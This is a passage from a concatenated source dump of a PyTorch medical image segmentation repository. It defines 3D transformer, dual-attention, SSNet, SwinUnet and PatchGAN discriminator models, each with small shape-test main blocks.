        super(Embeddings, self).__init__()
        self.is_window = is_window
        self.types = types
        self.config = config
        img_size = config.img_size
        in_channels = config.in_channels
        patch_size = config["patch_size"]
        self.patch_embeddings = nn.Conv3d(in_channels=in_channels,
                                          out_channels=config.hidden_size,
                                          kernel_size=patch_size,
                                          stride=patch_size)
        self.dropout = nn.Dropout(config.transformer["dropout_rate"])

    def forward(self, x):
        x = self.patch_embeddings(x)  # (B, hidden, n_patches^(1/2), n_patches^(1/2))
        # b, hidden, zz, xx, yy = x.shape
        # if self.types == 0:
        #     pass
        # elif self.types == 1:
        #     ## z directions
        #     x = x.view(b*zz, hidden, xx, yy)
        # elif self.types == 2:
        #     x = x.view(xx*yy*b, hidden, zz)
        # if self.is_window:
        #     return x.permute(0, 2, 3, 4, 1)
        # x = x.flatten(2)
        # x = x.transpose(-1, -2)  # (B, n_patches, hidden)
        # embeddings = x + self.position_embeddings
        # embeddings = self.dropout(embeddings)
        return x


class Postion_embedding(nn.Module):
    def __init__(self, config, types=0):
        super().__init__()
        img_size = config.img_size
        patch_size = config.patch_size
        if types == 0:
            self.position_embeddings = nn.Parameter(torch.zeros(1, (img_size[0] // patch_size[0]) * (img_size[1] // patch_size[1]) * (img_size[2] // patch_size[2]), config.hidden_size))
        elif types == 1:
            self.position_embeddings = nn.Parameter(torch.zeros(1, (img_size[1] // patch_size[1]) * (img_size[2] // patch_size[2]), config.hidden_size))
        elif types == 2:
            self.position_embeddings = nn.Parameter(torch.zeros(1, (img_size[0] // patch_size[0]), config.hidden_size))

    def forward(self, x):
        return x + self.position_embeddings


class BlockMulti(nn.Module):
    def __init__(self, config, is_position=False):
        super(BlockMulti, self).__init__()
        self.config = config
        self.input_shape = config.img_size
        self.hidden_size = config.hidden_size
        self.attention_norm = nn.LayerNorm(config.hidden_size, eps=1e-6)
        self.ffn_norm = nn.LayerNorm(config.hidden_size, eps=1e-6)
        self.ffn = Mlp(config)
        self.attn = MultiAttention(config, is_position=is_position)

    def forward(self, x, attention=False):
        batch_size, hidden_size, D, W, H = x.shape
        h = x.view(batch_size, D*W*H, hidden_size)
        # Note: MultiAttention.forward only accepts `x` and never returns attention
        # maps, so the old ``if attention: x, att = self.attn(x, attention)`` branch
        # could not work; the flag is kept for interface compatibility but ignored.
        x = self.attn(x)
        x = x + h
        x = self.attention_norm(x)

        h = x
        x = self.ffn(x)
        x = x + h
        x = self.ffn_norm(x)

        x = x.transpose(-1, -2)
        out_size = (self.input_shape[0] // self.config.patch_size[0],
                    self.input_shape[1] // self.config.patch_size[1],
                    self.input_shape[2] // self.config.patch_size[2],)
        x = x.view((batch_size, self.config.hidden_size, out_size[0], out_size[1], out_size[2])).contiguous()
        return x
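# A minimal sketch of how the three attention routes combine, mirroring the
# commented MultiAttention test at the bottom of this file; the get_config
# arguments are illustrative and assume the config defaults provide hidden_size,
# num_heads and window_size. Input is (batch, hidden, D, W, H); the output is the
# summed token tensor (batch, D*W*H, hidden).
def _multi_attention_shape_demo():
    config = get_config(in_channels=128, patch_size=(1, 1, 1), img_size=(16, 16, 16), mlp_dim=64)
    net = MultiAttention(config)
    t1 = torch.rand(1, 128, 16, 16, 16)
    out = net(t1)
    print(out.shape)  # (1, 4096, hidden_size): slice-, depth- and window-attention summed per token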
# class GlobalAttention(nn.Module):
#     def __init__(self, in_channels, out_channels, patch_size, img_size, num_heads=1, mlp_size=256, num_layers=1, types=0):
#         super().__init__()
#         self.config = get_config(in_channels=in_channels, hidden_size=out_channels,
#                                  patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size, num_heads=num_heads)
#         self.attention = Attention(self.config)
#         self.embeddings = Embeddings(self.config, types=types)
#         self.types = types

#     def forward(self, x):
#         input_shape = self.config.img_size
#         batch_size = x.shape[0]
#         x = self.embeddings(x)
#         return


class SpatialTransformerLayer(nn.Module):
    def __init__(self, in_channels, out_channels, patch_size, img_size, num_heads=8, mlp_size=256, num_layers=1, window_size=(8, 8, 8)):
        super().__init__()
        self.config = get_config(in_channels=in_channels, hidden_size=out_channels,
                                 patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size,
                                 num_heads=num_heads, window_size=window_size)
        self.block_list = nn.ModuleList([BlockMulti(self.config, is_position=True) if i == 0 else BlockMulti(self.config) for i in range(num_layers)])
        self.embeddings = Embeddings(self.config)

    def forward(self, x):
        x = self.embeddings(x)
        for l in self.block_list:
            x = l(x)
        return x


class MyTransformer(nn.Module):
    def __init__(self, in_channels=3, out_channels=2, img_size=(128, 128, 128),
                 act: Union[str, tuple] = ("LeakyReLU", {"negative_slope": 0.1, "inplace": True}),
                 norm: Union[str, tuple] = ("instance", {"affine": True}),
                 dropout: Union[float, tuple] = 0.0,
                 upsample: str = "deconv",
                 deepth = [2, 2, 2],
                 fea = [16, 16, 32, 64],
                 patchs_size=[(4, 4, 4), (2, 2, 2), (2, 2, 2)],
                 window_size=(4, 4, 4)
                 ):
        super().__init__()
        self.deepth = deepth
        self.patchs_size = patchs_size
        self.fea = fea
        self.first_conv = nn.Conv3d(in_channels, self.fea[0], kernel_size=3, padding=1, stride=1)
        self.final_conv = nn.Conv3d(self.fea[0], out_channels=out_channels, kernel_size=1, padding=0)
        self.trans = nn.ModuleList([])
        layer_img_size = img_size
        for i in range(len(self.deepth)):
            self.trans.append(SpatialTransformerLayer(in_channels=self.fea[i], out_channels=self.fea[i+1],
                                                      patch_size=self.patchs_size[i],
                                                      img_size=layer_img_size, num_heads=8,
                                                      mlp_size=self.fea[i+1], num_layers=self.deepth[i],
                                                      window_size=window_size))
            layer_img_size = (layer_img_size[0] // self.patchs_size[i][0],
                              layer_img_size[1] // self.patchs_size[i][1],
                              layer_img_size[2] // self.patchs_size[i][2])

        # self.upcat_4 = UpCat(3, self.fea[4], self.fea[3], self.fea[3], act, norm, dropout, upsample, pool_size=self.patchs_size[3])
        self.upcat_3 = UpCat(3, self.fea[3], self.fea[2], self.fea[2], act, norm, dropout, upsample, pool_size=self.patchs_size[2])
        self.upcat_2 = UpCat(3, self.fea[2], self.fea[1], self.fea[1], act, norm, dropout, upsample, pool_size=self.patchs_size[1])
        self.upcat_1 = UpCat(3, self.fea[1], self.fea[0], self.fea[0], act, norm, dropout, upsample, halves=False, pool_size=self.patchs_size[0])

    def forward(self, x):
        # x = self.trans(x)
        x = self.first_conv(x)
        down = [x]
        for l in self.trans:
            x = l(x)
            down.append(x)
            # print(x.shape)
        # for xx in down:
        #     print(xx.shape)
        # u4 = self.upcat_4(down[4], down[3])
        u3 = self.upcat_3(down[3], down[2])
        u2 = self.upcat_2(u3, down[1])
        u1 = self.upcat_1(u2, down[0])
        logits = self.final_conv(u1)
        return logits
        # return x
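# A minimal sketch of the resolution flow through MyTransformer, matching the live
# test in the __main__ block below; the sizes are the class defaults. With
# img_size=(128, 128, 128) and patchs_size=[(4, 4, 4), (2, 2, 2), (2, 2, 2)], the
# skip features collected in `down` have spatial extents 128 -> 32 -> 16 -> 8, and
# the three UpCat stages fuse them back up to full resolution.
def _my_transformer_shape_demo():
    net = MyTransformer(in_channels=3, out_channels=2, img_size=(128, 128, 128))
    t1 = torch.rand(1, 3, 128, 128, 128)
    logits = net(t1)
    print(logits.shape)  # torch.Size([1, 2, 128, 128, 128])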
if __name__ == '__main__':
    # t1 = torch.rand(1, 2, 32, 128, 128)
    # in_channels = 2
    # out_channels = 3
    # img_size = (32, 128, 128)
    # patch_size = (16, 16, 16)
    # num_layer = 1
    # mlp_size = 32
    # hidden_size = 128
    # conv3d = nn.Conv3d(3, 6, kernel_size=(8, 32, 32), stride=(8, 32, 32))
    #
    # out = conv3d(t1)
    #
    # print(out.shape)
    # # out = out.flatten(2)
    # print(out.shape)
    # config = get_config()
    # b = TransformerLayer(in_channels=3, out_channels=64, patch_size=(16, 16, 16), img_size=(32, 128, 128))
    # out = b(t1)
    # print(out.shape)
    # b = TransformerLayerMulti(in_channels=2, out_channels=2, patch_size=(16, 16, 16), img_size=(32, 128, 128), num_layers=2)
    #
    # print(b(t1).shape)
    # config = get_config(in_channels=in_channels, out_channels=hidden_size,
    #                     patch_size=patch_size, img_size=img_size, mlp_dim=mlp_size)
    # cross_att = BlockMultiCrossModal(config)
    #
    # t1 = torch.rand(1, 10, 128)
    # t2 = torch.rand(1, 10, 128)
    #
    # out = cross_att(t1, t2)
    #
    # print(out.shape)
    # b = TransformerLayerMultiCrossModal(in_channels=2, out_channels=2, patch_size=(4, 16, 16), img_size=(32, 128, 128),
    #                                     num_layers=2)
    # t2 = torch.rand(1, 2, 32, 128, 128)
    #
    # out = b(t1, t2)
    #
    # print(out.shape)
    # net = DoubleRouteTransformer(in_channels=2, out_channels=2, patch_size=(4, 16, 16), img_size=(32, 128, 128), num_layer=2)
    # out = net(t1, t2)
    # print(out.shape)
    # t1 = torch.rand(1, 16, 16, 16, 128)
    # net = SpatialTransformerLayer(2, 64, (1, 1, 1), (16, 16, 16), mlp_size=128, num_layers=2, types=2)
    # out = net(t1)
    # print(out.shape)
    # net = WindowAttention(dim=128, heads=16, head_dim=8, window_size=(4, 4, 4), relative_pos_embedding=True)
    # out = net(t1)
    # print(out.shape)
    # config = get_config(in_channels=128,
    #                     patch_size=(1, 1, 1), img_size=(16, 16, 16), mlp_dim=64)
    # net = MultiAttention(config)
    # t1 = torch.rand(1, 128, 16, 16, 16)
    # out = net(t1)
    # print(out.shape)

    #########
    t1 = torch.rand(1, 3, 128, 128, 128)
    # net = SpatialTransformerLayer(in_channels=64, out_channels=128, patch_size=(2, 2, 2), img_size=(16, 16, 16), num_layers=1, window_size=(8, 8, 8))
    net = MyTransformer(in_channels=3, out_channels=2, img_size=(128, 128, 128))
    out = net(t1)
    print(out.shape)
```
#### File: nets/msga_net/my_stacked_danet.py
```python
from functools import reduce
## Journal of Biomedical And Health Informatics (JBHI) 2020
import pdb
import torch
import torch.nn.functional as F
import torch.nn as nn
from torch.autograd import Variable

from bis3d_v2.networks.nets.msga_net.attention import (
    PAM_Module, CAM_Module, semanticModule, PAM_CAM_Layer, MultiConv
)
from bis3d_v2.networks.nets.msga_net.resnext101_regular import ResNeXt101


class DAF_stack(nn.Module):
    def __init__(self, in_channels, out_channels_end):
        super(DAF_stack, self).__init__()
        self.resnext = ResNeXt101(in_channels)
        self.down4 = nn.Sequential(
            nn.Conv2d(2048, 64, kernel_size=1), nn.BatchNorm2d(64), nn.PReLU()
        )
        self.down3 = nn.Sequential(
            nn.Conv2d(1024, 64, kernel_size=1), nn.BatchNorm2d(64), nn.PReLU()
        )
        self.down2 = nn.Sequential(
            nn.Conv2d(512, 64, kernel_size=1), nn.BatchNorm2d(64), nn.PReLU()
        )
        self.down1 = nn.Sequential(
            nn.Conv2d(256, 64, kernel_size=1), nn.BatchNorm2d(64), nn.PReLU()
        )

        inter_channels = 64
        out_channels = 64

        self.conv6_1 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1))
        self.conv6_2 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1))
        self.conv6_3 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1))
        self.conv6_4 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1))
        self.conv7_1 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1))
        self.conv7_2 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1))
        self.conv7_3 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64, out_channels, 1))
        self.conv7_4 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(64,
out_channels, 1)) self.conv8_1=nn.Conv2d(64,64,1) self.conv8_2=nn.Conv2d(64,64,1) self.conv8_3=nn.Conv2d(64,64,1) self.conv8_4=nn.Conv2d(64,64,1) self.conv8_11=nn.Conv2d(64,64,1) self.conv8_12=nn.Conv2d(64,64,1) self.conv8_13=nn.Conv2d(64,64,1) self.conv8_14=nn.Conv2d(64,64,1) self.softmax_1 = nn.Softmax(dim=-1) self.pam_attention_1_1= PAM_CAM_Layer(64, True) self.cam_attention_1_1= PAM_CAM_Layer(64, False) self.semanticModule_1_1 = semanticModule(128) self.conv_sem_1_1 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_1_2 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_1_3 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_1_4 = nn.Conv2d(128, 64, kernel_size=3, padding=1) #Dual Attention mechanism self.pam_attention_1_2 = PAM_CAM_Layer(64) self.cam_attention_1_2 = PAM_CAM_Layer(64, False) self.pam_attention_1_3 = PAM_CAM_Layer(64) self.cam_attention_1_3 = PAM_CAM_Layer(64, False) self.pam_attention_1_4 = PAM_CAM_Layer(64) self.cam_attention_1_4 = PAM_CAM_Layer(64, False) self.pam_attention_2_1 = PAM_CAM_Layer(64) self.cam_attention_2_1 = PAM_CAM_Layer(64, False) self.semanticModule_2_1 = semanticModule(128) self.conv_sem_2_1 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_2_2 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_2_3 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.conv_sem_2_4 = nn.Conv2d(128, 64, kernel_size=3, padding=1) self.pam_attention_2_2 = PAM_CAM_Layer(64) self.cam_attention_2_2 = PAM_CAM_Layer(64, False) self.pam_attention_2_3 = PAM_CAM_Layer(64) self.cam_attention_2_3 = PAM_CAM_Layer(64, False) self.pam_attention_2_4 = PAM_CAM_Layer(64) self.cam_attention_2_4 = PAM_CAM_Layer(64, False) self.fuse1 = MultiConv(256, 64, False) self.attention4 = MultiConv(128, 64) self.attention3 = MultiConv(128, 64) self.attention2 = MultiConv(128, 64) self.attention1 = MultiConv(128, 64) self.refine4 = MultiConv(128, 64, False) self.refine3 = MultiConv(128, 64, False) self.refine2 = MultiConv(128, 64, False) self.refine1 = MultiConv(128, 64, False) self.predict4 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict3 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict2 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict1 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict4_2 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict3_2 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict2_2 = nn.Conv2d(64, out_channels_end, kernel_size=1) self.predict1_2 = nn.Conv2d(64, out_channels_end, kernel_size=1) def forward(self, x): layer0 = self.resnext.layer0(x) layer1 = self.resnext.layer1(layer0) layer2 = self.resnext.layer2(layer1) layer3 = self.resnext.layer3(layer2) layer4 = self.resnext.layer4(layer3) down4 = F.upsample(self.down4(layer4), size=layer1.size()[2:], mode='bilinear') down3 = F.upsample(self.down3(layer3), size=layer1.size()[2:], mode='bilinear') down2 = F.upsample(self.down2(layer2), size=layer1.size()[2:], mode='bilinear') down1 = self.down1(layer1) predict4 = self.predict4(down4) predict3 = self.predict3(down3) predict2 = self.predict2(down2) predict1 = self.predict1(down1) fuse1 = self.fuse1(torch.cat((down4, down3, down2, down1), 1)) semVector_1_1,semanticModule_1_1 = self.semanticModule_1_1(torch.cat((down4, fuse1),1)) attn_pam4 = self.pam_attention_1_4(torch.cat((down4, fuse1), 1)) attn_cam4 = self.cam_attention_1_4(torch.cat((down4, fuse1), 1)) attention1_4=self.conv8_1((attn_cam4+attn_pam4)*self.conv_sem_1_1(semanticModule_1_1)) semVector_1_2, 
semanticModule_1_2 = self.semanticModule_1_1(torch.cat((down3, fuse1), 1)) attn_pam3 = self.pam_attention_1_3(torch.cat((down3, fuse1), 1)) attn_cam3 = self.cam_attention_1_3(torch.cat((down3, fuse1), 1)) attention1_3=self.conv8_2((attn_cam3+attn_pam3)*self.conv_sem_1_2(semanticModule_1_2)) semVector_1_3, semanticModule_1_3 = self.semanticModule_1_1(torch.cat((down2, fuse1), 1)) attn_pam2 = self.pam_attention_1_2(torch.cat((down2, fuse1), 1)) attn_cam2 = self.cam_attention_1_2(torch.cat((down2, fuse1), 1)) attention1_2=self.conv8_3((attn_cam2+attn_pam2)*self.conv_sem_1_3(semanticModule_1_3)) semVector_1_4, semanticModule_1_4 = self.semanticModule_1_1(torch.cat((down1, fuse1), 1)) attn_pam1 = self.pam_attention_1_1(torch.cat((down1, fuse1), 1)) attn_cam1 = self.cam_attention_1_1(torch.cat((down1, fuse1), 1)) attention1_1 = self.conv8_4((attn_cam1+attn_pam1) * self.conv_sem_1_4(semanticModule_1_4)) ##new design with stacked attention semVector_2_1, semanticModule_2_1 = self.semanticModule_2_1(torch.cat((down4, attention1_4 * fuse1), 1)) refine4_1 = self.pam_attention_2_4(torch.cat((down4,attention1_4*fuse1),1)) refine4_2 = self.cam_attention_2_4(torch.cat((down4,attention1_4*fuse1),1)) refine4 = self.conv8_11((refine4_1+refine4_2) * self.conv_sem_2_1(semanticModule_2_1)) semVector_2_2, semanticModule_2_2 = self.semanticModule_2_1(torch.cat((down3, attention1_3 * fuse1), 1)) refine3_1 = self.pam_attention_2_3(torch.cat((down3,attention1_3*fuse1),1)) refine3_2 = self.cam_attention_2_3(torch.cat((down3,attention1_3*fuse1),1)) refine3 = self.conv8_12((refine3_1+refine3_2) * self.conv_sem_2_2(semanticModule_2_2)) semVector_2_3, semanticModule_2_3 = self.semanticModule_2_1(torch.cat((down2, attention1_2 * fuse1), 1)) refine2_1 = self.pam_attention_2_2(torch.cat((down2,attention1_2*fuse1),1)) refine2_2 = self.cam_attention_2_2(torch.cat((down2,attention1_2*fuse1),1)) refine2 = self.conv8_13((refine2_1+refine2_2)*self.conv_sem_2_3(semanticModule_2_3)) semVector_2_4, semanticModule_2_4 = self.semanticModule_2_1(torch.cat((down1, attention1_1 * fuse1), 1)) refine1_1 = self.pam_attention_2_1(torch.cat((down1,attention1_1 * fuse1),1)) refine1_2 = self.cam_attention_2_1(torch.cat((down1,attention1_1 * fuse1),1)) refine1=self.conv8_14((refine1_1+refine1_2) * self.conv_sem_2_4(semanticModule_2_4)) predict4_2 = self.predict4_2(refine4) predict3_2 = self.predict3_2(refine3) predict2_2 = self.predict2_2(refine2) predict1_2 = self.predict1_2(refine1) predict1 = F.upsample(predict1, size=x.size()[2:], mode='bilinear') predict2 = F.upsample(predict2, size=x.size()[2:], mode='bilinear') predict3 = F.upsample(predict3, size=x.size()[2:], mode='bilinear') predict4 = F.upsample(predict4, size=x.size()[2:], mode='bilinear') predict1_2 = F.upsample(predict1_2, size=x.size()[2:], mode='bilinear') predict2_2 = F.upsample(predict2_2, size=x.size()[2:], mode='bilinear') predict3_2 = F.upsample(predict3_2, size=x.size()[2:], mode='bilinear') predict4_2 = F.upsample(predict4_2, size=x.size()[2:], mode='bilinear') # if self.training: # return semVector_1_1,\ # semVector_2_1, \ # semVector_1_2, \ # semVector_2_2, \ # semVector_1_3, \ # semVector_2_3, \ # semVector_1_4, \ # semVector_2_4, \ # torch.cat((down1, fuse1), 1),\ # torch.cat((down2, fuse1), 1),\ # torch.cat((down3, fuse1), 1),\ # torch.cat((down4, fuse1), 1), \ # torch.cat((down1, attention1_1 * fuse1), 1), \ # torch.cat((down2, attention1_2 * fuse1), 1), \ # torch.cat((down3, attention1_3 * fuse1), 1), \ # torch.cat((down4, attention1_4 * fuse1), 1), \ # 
semanticModule_1_4, \ # semanticModule_1_3, \ # semanticModule_1_2, \ # semanticModule_1_1, \ # semanticModule_2_4, \ # semanticModule_2_3, \ # semanticModule_2_2, \ # semanticModule_2_1, \ # predict1, \ # predict2, \ # predict3, \ # predict4, \ # predict1_2, \ # predict2_2, \ # predict3_2, \ # predict4_2 return predict4_2 # else: # return ((predict1_2 + predict2_2 + predict3_2 + predict4_2) / 4) if __name__ == '__main__': model = DAF_stack(in_channels=2, out_channels_end=2) t1 = torch.rand(1, 2, 256, 256) out = model(t1) print(out.shape) ``` #### File: nets/msga_net/resnext.py ```python from functools import reduce import torch import torch.nn as nn from torchvision.models import resnext50_32x4d, resnext101_32x8d class LambdaBase(nn.Sequential): def __init__(self, fn, *args): super(LambdaBase, self).__init__(*args) self.lambda_func = fn def forward_prepare(self, input): output = [] for module in self._modules.values(): output.append(module(input)) return output if output else input class Lambda(LambdaBase): def forward(self, input): return self.lambda_func(self.forward_prepare(input)) class LambdaMap(LambdaBase): def forward(self, input): return list(map(self.lambda_func, self.forward_prepare(input))) class LambdaReduce(LambdaBase): def forward(self, input): return reduce(self.lambda_func, self.forward_prepare(input)) def resnext50(): model = resnext50_32x4d() model.conv1 = nn.Conv2d(1, 64, (7, 7), (2, 2), (3, 3), 1, 1, bias = False) model.avgpool = nn.AvgPool2d((7,7), (1, 1)) model.fc = nn.Sequential( Lambda(lambda x: x.view(x.size(0), -1)), Lambda(lambda x: x.view(1, -1) if 1 == len(x.size()) else x), nn.Linear(2048, 1000) ) return model def resnext101(in_channels): model = resnext101_32x8d() model.conv1 = nn.Conv2d(in_channels, 64, (7, 7), (2, 2), (3, 3), 1, 1, bias = False) model.avgpool = nn.AvgPool2d((7,7), (1, 1)) model.fc = nn.Sequential( Lambda(lambda x: x.view(x.size(0), -1)), Lambda(lambda x: x.view(1, -1) if 1 == len(x.size()) else x), nn.Linear(2048, 1000) ) return model ``` #### File: networks/nets/ss_net.py ```python import torch import torch.nn as nn import torch.nn.functional as F import torch.nn.init as init import torch.utils.model_zoo as model_zoo from torchvision import models import math class GCN(nn.Module): def __init__(self, inplanes, planes, ks=7): super(GCN, self).__init__() self.conv_t = nn.Conv2d(inplanes, planes, kernel_size=ks, padding=int(ks/2)) def forward(self, x): x = self.conv_t(x) return x class Refine(nn.Module): def __init__(self, planes): super(Refine, self).__init__() self.bn = nn.BatchNorm2d(planes) self.relu = nn.ReLU(inplace=True) self.conv1 = nn.Conv2d(planes, planes, kernel_size=3, padding=1) self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1) def forward(self, x): residual = x x = self.bn(x) x = self.relu(x) x = self.conv1(x) x = self.bn(x) x = self.relu(x) x = self.conv2(x) out = residual + x return out class SSNet(nn.Module): def __init__(self, num_classes): super(SSNet, self).__init__() self.num_classes = num_classes resnet = models.resnet50(pretrained=True) self.conv1 = resnet.conv1 self.bn0 = resnet.bn1 self.relu = resnet.relu self.maxpool = resnet.maxpool self.layer1 = resnet.layer1 self.layer2 = resnet.layer2 self.layer3 = resnet.layer3 self.layer4 = resnet.layer4 self.gcn1 = GCN(2048, self.num_classes) self.gcn2 = GCN(1024, self.num_classes) self.gcn3 = GCN(512, self.num_classes) self.gcn4 = GCN(256, self.num_classes) self.gcn5 = GCN(64, self.num_classes) self.refine1 = Refine(self.num_classes) self.refine2 = 
Refine(self.num_classes) self.refine3 = Refine(self.num_classes) self.refine4 = Refine(self.num_classes) self.refine5 = Refine(self.num_classes) self.refine6 = Refine(self.num_classes) self.refine7 = Refine(self.num_classes) self.refine8 = Refine(self.num_classes) self.refine9 = Refine(self.num_classes) self.refine10 = Refine(self.num_classes) def forward(self, x): input = x x = self.conv1(x) x = self.bn0(x) x = self.relu(x) conv_x = x x = self.maxpool(x) pool_x = x fm1 = self.layer1(x) fm2 = self.layer2(fm1) fm3 = self.layer3(fm2) fm4 = self.layer4(fm3) gcfm1 = self.refine1(self.gcn1(fm4)) gcfm2 = self.refine2(self.gcn2(fm3)) gcfm3 = self.refine3(self.gcn3(fm2)) gcfm4 = self.refine4(self.gcn4(fm1)) gcfm5 = self.refine5(self.gcn5(pool_x)) fs1 = self.refine6(F.upsample_bilinear(gcfm1, fm3.size()[2:]) + gcfm2) fs2 = self.refine7(F.upsample_bilinear(fs1, fm2.size()[2:]) + gcfm3) fs3 = self.refine8(F.upsample_bilinear(fs2, fm1.size()[2:]) + gcfm4) fs4 = self.refine9(F.upsample_bilinear(fs3, pool_x.size()[2:]) + gcfm5) out = self.refine10(F.upsample_bilinear(fs4, input.size()[2:])) return out if __name__ == '__main__': net = SSNet(1) t1 = torch.rand(1, 3, 128, 128) out = net(t1) print(out.shape) ``` #### File: nets/swin_unet/model.py ```python import torch import numpy import torch.nn as nn import copy from medical_seg.networks.nets.swin_unet.swin_transformer_unet_skip_expand_decoder_sys import SwinTransformerSys class SwinUnet(nn.Module): def __init__(self, img_size=224, in_channel=3, num_classes=21843, zero_head=False, vis=False): super(SwinUnet, self).__init__() self.num_classes = num_classes self.loss_func = nn.CrossEntropyLoss() self.zero_head = zero_head self.in_channels = in_channel self.swin_unet = SwinTransformerSys(img_size=img_size, patch_size=4, in_chans=in_channel, num_classes=self.num_classes, embed_dim=96, depths=[ 2, 2, 2, 2 ], num_heads=[ 3, 6, 12, 24 ], window_size=7, mlp_ratio=4, qkv_bias=True, qk_scale=False, drop_rate=0.2, drop_path_rate=0.2, ape=False, patch_norm=True, use_checkpoint=False) def forward_train(self, x): ## x : (batch, modality, d, w, h ) input = x.squeeze(dim=0) input2d = input.permute(1, 0, 2, 3) d, in_channels, w, h = input2d.shape if w != 224 or h != 224: input2d = nn.functional.interpolate(input2d, size=(224, 224), mode="bilinear", align_corners=False) logits = self.swin_unet(input2d) logits = logits.transpose(1, 0) logits = logits.unsqueeze(dim=0) return logits def forward(self, x): ## x : (batch, modality, d, w, h ) input = x.squeeze(dim=0) input2d = input.permute(1, 0, 2, 3) d, in_channels, w, h = input2d.shape if w != 224 or h != 224: input2d = nn.functional.interpolate(input2d, size=(224, 224), mode="bilinear", align_corners=False) logits = self.swin_unet(input2d) if w != 224 or h != 224: logits = nn.functional.interpolate(logits, size=(w, h), mode="bilinear", align_corners=False) logits = logits.transpose(1, 0) logits = logits.unsqueeze(dim=0) return logits def compute_loss(self, pred, label): b, d, w, h = label.shape label = label.float() if w != 224 or h != 224: label = torch.unsqueeze(label, dim=1) label = nn.functional.interpolate(label, size=(d, 224, 224), mode="nearest") label = torch.squeeze(label, dim=1).long() loss = self.loss_func(pred, label) return loss def load_from(self, pretrained_path): device = next(self.swin_unet.parameters()).device print("pretrained_path:{}".format(pretrained_path)) pretrained_dict = torch.load(pretrained_path, map_location=device) pretrained_dict = pretrained_dict['model'] if self.in_channels != 3: embed_weight 
= pretrained_dict["patch_embed.proj.weight"]
            embed_weight = embed_weight.mean(dim=1, keepdim=True)
            embed_weight = embed_weight.repeat(1, self.in_channels, 1, 1)
            pretrained_dict["patch_embed.proj.weight"] = embed_weight

        print("---start load pretrained model of swin encoder---")
        model_dict = self.swin_unet.state_dict()
        full_dict = copy.deepcopy(pretrained_dict)
        for k, v in pretrained_dict.items():
            if "layers." in k:
                current_layer_num = 3 - int(k[7:8])
                current_k = "layers_up." + str(current_layer_num) + k[8:]
                full_dict.update({current_k: v})
        for k in list(full_dict.keys()):
            if k in model_dict:
                if full_dict[k].shape != model_dict[k].shape:
                    print("delete:{};shape pretrain:{};shape model:{}".format(k, v.shape, model_dict[k].shape))
                    del full_dict[k]

        self.swin_unet.load_state_dict(full_dict, strict=False)


if __name__ == "__main__":
    net_3d = SwinUnet(img_size=224, in_channel=4, num_classes=2)
    net_3d.load_from("./medical_seg/networks/nets/swin_unet//swin_tiny_patch4_window7_224.pth")
    t1 = torch.rand(1, 4, 5, 224, 224)
    out = net_3d(t1)
    print(out.shape)
```
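The channel-inflation trick in `load_from` above can be checked in isolation: the pretrained RGB patch-embedding kernels are averaged over the colour axis and the mean is repeated across the new number of input channels. A minimal stand-alone sketch (the 96/3/4x4 sizes match Swin-T's patch embedding but are illustrative here):
```python
import torch

# Pretrained patch embedding weight: (out_channels, in_channels=3, kh, kw).
w_rgb = torch.randn(96, 3, 4, 4)

# Inflate to 4 input channels the way SwinUnet.load_from does it:
w_mean = w_rgb.mean(dim=1, keepdim=True)   # (96, 1, 4, 4), average over RGB
w_4ch = w_mean.repeat(1, 4, 1, 1)          # (96, 4, 4, 4), repeat the mean kernel
print(w_4ch.shape)
```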
#### File: networks/PatchGAN/discriminator.py
```python
import torch
import torch.nn as nn
import numpy as np


# Defines the PatchGAN discriminator with the specified arguments.
class NLayerDiscriminator(nn.Module):
    def __init__(self, input_nc, mse=True, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, device="cpu"):
        super(NLayerDiscriminator, self).__init__()
        self.device = device
        self.to(device)
        kw = 4
        padw = int(np.ceil((kw - 1) / 2))
        sequence = [
            nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),
            nn.LeakyReLU(0.2, True)
        ]

        nf_mult = 1
        nf_mult_prev = 1
        for n in range(1, n_layers):
            nf_mult_prev = nf_mult
            nf_mult = min(2**n, 8)
            sequence += [
                nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                          kernel_size=kw, stride=2, padding=padw),
                # TODO: use InstanceNorm
                norm_layer(ndf * nf_mult),
                nn.LeakyReLU(0.2, True)
            ]

        nf_mult_prev = nf_mult
        nf_mult = min(2**n_layers, 8)
        sequence += [
            nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
                      kernel_size=kw, stride=1, padding=padw),
            # TODO: use InstanceNorm
            norm_layer(ndf * nf_mult),
            nn.LeakyReLU(0.2, True)
        ]

        sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]

        self.model = nn.Sequential(*sequence)

        if mse:
            self.loss = nn.MSELoss()
        else:
            self.loss = nn.CrossEntropyLoss()

    def forward(self, input):
        # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor):
        #     return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
        # else:
        return self.model(input)

    def get_loss_D(self, x, pred_res, label):
        if len(label.shape) == 3:
            label = label.unsqueeze(1)
        # x: (1, 2, 256, 256)
